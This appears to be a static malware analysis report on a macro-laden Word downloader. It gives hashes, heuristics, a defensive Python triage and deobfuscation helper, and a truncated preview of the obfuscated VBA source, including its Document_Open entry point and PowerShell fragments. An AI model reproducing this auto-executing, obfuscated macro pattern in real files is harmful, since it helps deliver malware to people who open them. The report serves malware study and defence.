Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2247460defe5fb27…

MALICIOUS

Office (OLE)

Size: 123.5 KB
Created: 2018-04-24 20:34:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: cc9dd0d75df2d9205c5776d5ce42dbc5
SHA-1: 5627a803a14367fbb4357d844f090ef6c6c1c415
SHA-256: 2247460defe5fb2769f82a3a106df0a241c2c80fb844f9744d8aeb9f9bdba298
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a malicious Word document containing VBA macros. It defines a Document_open procedure (VBA identifiers are case-insensitive, so this is the Document_Open auto-execution entry point), which Word runs as soon as the document is opened with macros enabled, and the macro code reaches a Shell() call, i.e. an attempt to execute an arbitrary command. The extracted source is padded with junk arithmetic statements and assembles its real strings from fragments separated by a recurring filler token (Gxu+Gxu) and '+' seams; once those are stripped, fragments such as env:public, '.ex'+'e' and foreach( become visible, which is consistent with an obfuscated PowerShell command line. Auto-execution combined with a Shell() call is the classic downloader/dropper pattern: the macro's job is to fetch and launch a second-stage payload. Because the preview is truncated, the full command line and any payload URL are not recoverable from this report.

Heuristics (5)

  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro code contains a Shell() call, i.e. direct command execution from the document.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The module defines a Document_Open procedure, which Word runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no visible source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection by itself; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that appears in ordinary Office drawing content; it is not a network indicator and should not be treated as a payload or C2 URL.
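The heuristics above are keyword and token checks over the extracted source: an auto-execution procedure name, execution tokens such as Shell(), and the strings the macro assembles. As an added example for this report (not the analyzer's code and not the sample's own decoder), the Python below runs the same kind of checks over a constructed snippet copied from the macros.bas preview and adds a deobfuscation pass for the string-concatenation pattern visible in PcUWwkmvVE. The filler token "Gxu+Gxu", the "'+'" seams and the "5ML" to quote and "OYU" to "$" substitutions are inferred from the visible literals and are assumptions; what the sample's wrapper PZKzoR actually does with its numeric arguments is not recoverable from the preview, so the helper neither trims prefixes nor claims to reproduce it.

```python
"""Triage helpers for extracted VBA source: auto-exec entry points, execution
tokens, and a peel for string-concatenation obfuscation.

Added example for this report; not the analyzer's code and not the sample's
decoder. The filler token "Gxu+Gxu", the "'+'" seams and the "5ML" -> "'" and
"OYU" -> "$" substitutions are inferred from the visible literals (assumptions).
"""
import json
import re

# Constructed sample: lines copied from the macros.bas preview. The numeric
# arguments to PZKzoR were constant-folded (x - x + 7 + x - x == 7); the
# function itself is not reproduced here.
SAMPLE_VBA = r'''
Private Sub Document_open()
On Error Resume Next
AoNafpuw (aHAjzw + PcUWwkmvVE + XwEXG)
End Sub
Function PcUWwkmvVE()
On Error Resume Next
qRYsDFmrM = PZKzoR("XVs3ri+'+'G'+'xuSDGxu+GxuC = OYGxu+'+'GxuUGxu+Gxuenv:pGxu+GxuubliGxu+Gxuc Gxu+Gxu+ Gxu+GHD", 7, 82)
CnjSWWr = PZKzoR("MSlExu5MLNvC5Gxu+GxuML +Gxu+Gxu OYUNSGxu+GxuB + (5ML.ex5ML+5Gxu+GxuML'+'Gxu+Gxue5Gxu+GxuMLGxu+Gxu);forGxu+GxueGxu+GxuaGxu+G'+'xucGxu+Gxuh(Gxu+iM", 5, 138)
OHwtzZjdjk = PZKzoR("jjbtsjGxu+GxuvOadFGxu+GxuIsGxu+GxujvGxu+GxuleZGx'+'u+Gxuts(OYGxu+GxuUasGxu+GxufGxu+Gxuc.Gxu+GxuZtGxu+GxusTGxu+GxuoStGxu+Gxursjv'+'is'+I2wi", 5, 130)
End Function
'''

# Procedure names Word/Excel run without user interaction (case-insensitive in VBA).
AUTOEXEC_NAMES = ("Document_Open", "Document_Close", "Document_New", "AutoOpen",
                  "AutoExec", "AutoClose", "AutoNew", "Workbook_Open", "Auto_Open")
PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)",
                     re.IGNORECASE | re.MULTILINE)
# Tokens that indicate command execution, object creation or download.
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "ShellExecute",
               "URLDownloadToFile", "powershell", "cmd.exe", ".Run")
# Literal handed to the sample's string wrapper (name taken from the preview).
WRAPPED_LITERAL_RE = re.compile(r'PZKzoR\("([^"]*)"')
# PowerShell fragments worth surfacing once the filler is gone.
POWERSHELL_FRAGMENTS = ("$env:", "'.ex'+'e'", "foreach(", "ToStr", "DownloadFile",
                        "Start-Process", "Invoke-Expression", "IEX")


def find_autoexec(src):
    """Return auto-exec procedure names defined in src, normalised to canonical case."""
    canon = {n.lower(): n for n in AUTOEXEC_NAMES}
    return [canon[m.group(1).lower()] for m in PROC_RE.finditer(src)
            if m.group(1).lower() in canon]


def find_exec_tokens(src):
    """Return the execution-related tokens present anywhere in src (case-insensitive)."""
    low = src.lower()
    return [t for t in EXEC_TOKENS if t.lower() in low]


def deobfuscate(literal, filler="Gxu+Gxu", seam="'+'", quote="5ML", dollar="OYU"):
    """Peel the concatenation obfuscation seen in the preview (assumed transform).

    Order matters: the seams split the filler token itself ("G'+'xu"), so they
    go first; the quote substitution goes last so the '+' it legitimately
    produces ("'.ex'+'e'") is not mistaken for a seam. Leading/trailing junk
    (e.g. "XVs3ri+Gxu") is left in place; the real decoder presumably trims it.
    """
    s = literal.replace(seam, "")
    s = s.replace(filler, "")
    s = s.replace(quote, "'")
    return s.replace(dollar, "$")


def decode_wrapped_strings(src):
    """Decode every literal handed to the wrapper, in source order."""
    return [deobfuscate(m.group(1)) for m in WRAPPED_LITERAL_RE.finditer(src)]


def powershell_fragments(decoded):
    """Fragments from POWERSHELL_FRAGMENTS that appear in any decoded string."""
    return sorted({f for s in decoded for f in POWERSHELL_FRAGMENTS if f in s})


def triage(src):
    """Run all checks and return a dict suitable for a report or a SIEM event."""
    decoded = decode_wrapped_strings(src)
    return {
        "autoexec": find_autoexec(src),
        "exec_tokens": find_exec_tokens(src),
        "decoded_strings": decoded,
        "powershell_fragments": powershell_fragments(decoded),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

On the preview snippet the scan reports Document_Open as the auto-exec entry point and no execution token, because the Shell() call flagged by OLE_VBA_SHELL lies beyond the truncated preview; the decoded strings expose $env:public, '.ex'+'e' and foreach(, which is what points triage toward a PowerShell stager rather than the junk arithmetic that fills most of the module. The third literal only partially decodes (ToStr is recognisable), a reminder that a single filler pass is a starting point, not a full decoder.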

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 32288 bytes
SHA-256: cf3b58fa93b3c2407d9be344b6c5cee1098dffbb50e79df0a0c7943b78e45910
Script preview (first 1,000 lines of the extracted source):
Attribute VB_Name = "VUlacfjdLT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uKYqZw(zFEAs)
VzwqI = 57820 * rNZQJ + 67136 * ChrB(67307 * Rnd(79813) - 24492 + jzWWrQ) - 7407 - Rnd(HjwVXj) + 71996 - Tqifv * 62626 * Chr(jGhlIh)
End Sub
Sub NYlNYC(zijuC)
zSWpt = 59439 * PsLjwz + 11498 * ChrB(74927 * Rnd(31399) - 18609 + vGQTYk) - 19269 - Rnd(izVMv) + 71619 - fuQkrr * 56346 * Chr(bVNEQY)
jhUEwv = 70495 * ulflwo + 88646 * ChrB(62691 * Rnd(30300) - 91610 + ULWjR) - 74910 - Rnd(NpwKj) + 87721 - mPorrm * 94264 * Chr(RVwLGh)
jozIM = 8917 * MACRji + 91282 * ChrB(60352 * Rnd(69420) - 11415 + CKYFpY) - 18017 - Rnd(ZuAiG) + 62700 - HIJMXh * 58363 * Chr(DnoZF)
End Sub
Sub zllsZ(XjbzZ)
FfrMSw = 70458 * anVXiE + 46773 * ChrB(18500 * Rnd(41229) - 35180 + wDsZI) - 29003 - Rnd(jcObjK) + 75725 - cwJrU * 84540 * Chr(KnMQOJ)
fNLIw = 50957 * MFjwcQ + 14845 * ChrB(63930 * Rnd(99117) - 12222 + kKcZA) - 58510 - Rnd(IJtENs) + 1648 - LzAPXM * 24774 * Chr(Psausb)
End Sub
Private Sub Document_open()
On Error Resume Next
coFFiz = 85372 * MjLpQ + 3815 * ChrB(15118 * Rnd(85800) - 82494 + vFKjji) - 97241 - Rnd(hMjak) + 9733 - cQQHmW * 63595 * Chr(rniMW)
AoNafpuw (aHAjzw + PcUWwkmvVE + XwEXG)
SfZmw = 12392 * olrlE + 48917 * ChrB(28337 * Rnd(73387) - 35460 + BVcbGE) - 62480 - Rnd(mIKEUL) + 69262 - POnSBm * 11549 * Chr(HpQPi)
End Sub
Sub hkEDD(ifLas)
KwwkRf = 2160 * Jzwzq + 28394 * ChrB(30703 * Rnd(29223) - 38973 + oRMOa) - 50700 - Rnd(QIiBkD) + 24326 - GcHOW * 46009 * Chr(NGOhlF)
olPLu = 73232 * ivXXkB + 45728 * ChrB(35780 * Rnd(45331) - 49299 + mZkmHA) - 95221 - Rnd(EDGzso) + 89780 - TwlYI * 51093 * Chr(YjkrmW)
viplz = 59887 * CdPNBh + 45731 * ChrB(53508 * Rnd(93518) - 59431 + pwEVlB) - 77778 - Rnd(bLGXJ) + 21679 - rIXKH * 80046 * Chr(aRTWK)
End Sub
Sub sawjF(wYIZw)
wnDRwG = 11376 * iqPDm + 45270 * ChrB(87278 * Rnd(50527) - 46899 + CPqhSA) - 28730 - Rnd(RBOwj) + 66114 - WKBLIU * 25497 * Chr(IbCLs)
End Sub
Sub iOWzUX(zPUDCZ)
EnjGhc = 31512 * rOPSo + 97219 * ChrB(65790 * Rnd(11036) - 31475 + WZjmsw) - 28122 - Rnd(tYvhI) + 12372 - YLUvvd * 30327 * Chr(VXHkCi)
PJEOjA = 9063 * vhsWj + 84916 * ChrB(33474 * Rnd(19771) - 12681 + WQmNK) - 39606 - Rnd(GsOPl) + 28620 - cKImc * 87544 * Chr(vUtZOD)
End Sub

Attribute VB_Name = "joDMAafS"
Sub BzjDZH(CJSfuY)
fhNibv = 86262 * vQDaDK + 4599 * ChrB(69699 * Rnd(76927) - 62798 + OGmsq) - 1340 - Rnd(dqPvXN) + 14681 - YfnsD * 43403 * Chr(MDSzz)
End Sub
Function PcUWwkmvVE()
On Error Resume Next
NzSZzi = 40739 * zTCtR + 389 * ChrB(99217 * Rnd(64900) - 36098 + VuoQNE) - 30306 - Rnd(AIRvUN) + 50156 - nwouzG * 50386 * Chr(PQwLqV)
qRYsDFmrM = PZKzoR("XVs3ri+'+'G'+'xuSDGxu+GxuC = OYGxu+'+'GxuUGxu+Gxuenv:pGxu+GxuubliGxu+Gxuc Gxu+Gxu+ Gxu+GHD", NSRsr - NSRsr + 7 + NSRsr - NSRsr, NSRsr - NSRsr + 82 + NSRsr - NSRsr)
AtYBj = 81064 * kNJUdM + 69975 * ChrB(8025 * Rnd(98369) - 79082 + aMAtY) - 95806 - Rnd(ULAwI) + 8304 - iIQBvL * 87876 * Chr(qOald)
WiCrB = 52485 * wGXKv + 91934 * ChrB(64217 * Rnd(31129) - 42582 + iiwWzN) - 54114 - Rnd(MoQPnk) + 99379 - Olfba * 81198 * Chr(Bobjn)
CnjSWWr = PZKzoR("MSlExu5MLNvC5Gxu+GxuML +Gxu+Gxu OYUNSGxu+GxuB + (5ML.ex5ML+5Gxu+GxuML'+'Gxu+Gxue5Gxu+GxuMLGxu+Gxu);forGxu+GxueGxu+GxuaGxu+G'+'xucGxu+Gxuh(Gxu+iM", OrLRHs - OrLRHs + 5 + OrLRHs - OrLRHs, OrLRHs - OrLRHs + 138 + OrLRHs - OrLRHs)
OYtiz = 64584 * zmZVaP + 78584 * ChrB(74774 * Rnd(90382) - 67262 + mKihv) - 70337 - Rnd(SnVvhV) + 57202 - SwPXjn * 6245 * Chr(TbMKB)
YZbti = 48261 * isbuG + 46041 * ChrB(70883 * Rnd(36126) - 76201 + orfzi) - 4104 - Rnd(EsTIm) + 11541 - QZtDnv * 50568 * Chr(VbPjfi)
OHwtzZjdjk = PZKzoR("jjbtsjGxu+GxuvOadFGxu+GxuIsGxu+GxujvGxu+GxuleZGx'+'u+Gxuts(OYGxu+GxuUasGxu+GxufGxu+Gxuc.Gxu+GxuZtGxu+GxusTGxu+GxuoStGxu+Gxursjv'+'is'+I2wi", BZGFI - BZGFI + 5 + BZGFI - BZGFI, BZGFI - BZGFI + 130 + BZGFI - BZGFI)
FFsoo = 70609 * dMqXao + 81098 * ChrB(11338 * Rnd(98087) - 85168 + qdjiji) - 85097 - R
... (truncated)